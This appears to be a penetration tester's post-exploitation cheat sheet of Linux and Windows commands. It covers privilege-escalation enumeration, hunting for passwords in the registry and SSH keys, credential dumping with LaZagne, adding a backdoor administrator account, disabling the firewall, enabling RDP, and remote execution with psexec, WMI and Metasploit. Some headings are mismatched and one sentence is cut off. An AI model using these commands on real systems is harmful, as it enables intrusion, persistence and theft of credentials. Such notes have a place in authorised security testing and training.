Post exploitation



  • Check wrong permissions:

Find setuid binaries:

$find / -perm -4000 -ls 2> /dev/null

Find files world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

  • Look for interesting files:
$find / -name "*.txt" -ls 2> /dev/null
$find / -name "*.log" -ls 2> /dev/null

  • Check sudo:
$sudo su
$sudo -l

  • Decrypt PKCS#12 objects:
$openssl pkcs12 -info -in $FILE

  • Show certs in PKCS#7 file:
$openssl pkcs7 -print_certs -inform DER -in $FILE
$openssl smime -verify -in signed.p7 -inform [pem|der]

Show keystore content:

$keytool -list -v -keystore keystore.jks

  • Commands for information gathering:
$ps -ef


$/sbin/ifconfig -a

$route -n

$cat /etc/crontab
$ls -la /var/spool/cron*/
$ls -la /etc/cron.d

$cat /etc/exports

$cat /etc/redhat* /etc/debian* /etc/*release

$netstat -tanu

Find users with shell access:

$cat /etc/passwd | egrep -e '/bin/(ba)?sh'

Check bootup services:

$ls /etc/rc*

SSH relationships and logins:

$cat ~/.ssh/*




Check filesystem:

Like "ls -la" in Linux:

C:>dir /A:H

C:>dir /s /b C:\ | findstr /E ".txt" > txt.txt
C:>dir /s /b C:\ | findstr /E ".log" > log.txt
C:>dir /s /b C:\ | findstr /E ".doc" > txt
C:>dir /s /b C:\ | findstr /E ".xls" > xls.txt
C:>dir /s /b C:\ | findstr /E ".xml" > xml.txt

Check registry:

C:>reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
C:>reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
C:>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
C:>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

C:>schtasks /query /fo LIST /v > schtasks.txt
C:>tasklist /SVC > tasklist.txt

Other checks:

C:>wmic os where Primary='TRUE' reboot

List hotfixes:

C:>wmic qfe

C:>notepad myfile.txt:lion.txt
C:>quser > rdp.txt
C:>netstat -an > netstat.txt
C:>netsh firewall show config > firewall.txt
C:>icacls service.exe
C:>type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

C:>wmic service get name,displayname,pathname,startmode > wmic_service.txt
C:>wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
C:>wmic /node:"" product get name,version,vendor
C:>wmic process get Caption,CommandLine
C:>wmic printer list status
C:>wmic cpu get

List SIDs of the system (as admin):

C:>wmic useraccount get name,sid,fullname

Net commands:

C:>net view
C:>net view \\host
C:>net share
C:>net use z: \\host\dir
C:>net users
C:>net user %username%
C:>net config rdr

Backdoor account:

C:>net user hax0r hax0r /add
C:>net localgroup administrators hax0r /add
C:>net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

C:>route print
C:>arp -A
C:>ipconfig /all

Show files attributes / permissions

C:>cacls cmd.exe
C:>attrib cmd.exe

List services:

C:>sc queryex type= service state= all

List services

C:>net start

Idem for Win XP:

C:>echo %USERNAME%

  • Firewall
C:>netsh firewall show state
C:>netsh firewall show config
C:>netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:>netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:>netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:>netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

C:>netsh advfirewall set currentprofile state off

C:>netsh advfirewall set allprofiles state off

  • RDP

Show RDP sessions:


C:>reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
msf>reg queryval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled
msf>reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled -d 1
C:>netsh firewall set service type = remotedesktop mode = enable
C:>net start termservice
C:>net start "Terminal Services"
C:>svchost.exe -k termsvcs
C:>tasklist /svc /S servername/U username /P password

Change RDP port:

\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389 

Remote Execution

C:>wmis -U DOMAIN\<USER>%<PASS> //<DC> cmd.exe /c <COMMAND>
C:>wmic /node:$IP /user:administrator /password:mypassword bios get serialnumber
C:>tasklist.exe /S $IP /U domain\username
C:>tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
C:>taskkill.exe /S $IP /U domain\username /F /FI "norton"
C:>quser /SERVER:$IP

From sysinternals psexec:

C:>psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
C:>psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
C:>psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

C:>psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >

  • In the same host but with other role:
C:>runas /user:administrator cmd
C:>runas /noprofile /user:DOMAIN\administrator cmd
C:>runas /profile /env /user:DOMAIN\<USER> "%windir%\system32\script.bat"

  • Windows exploit suggester / Windows-Exploit-Suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (

$python --update
$python --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

  • Manual method
C:>dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
C:>dir %USERPROFILE%\Favorites
C:>type C:\Windows\System32\drivers\etc\hosts

C:>laZagne.exe all

C:>laZagne.exe browsers

C:>laZagne.exe browsers -firefox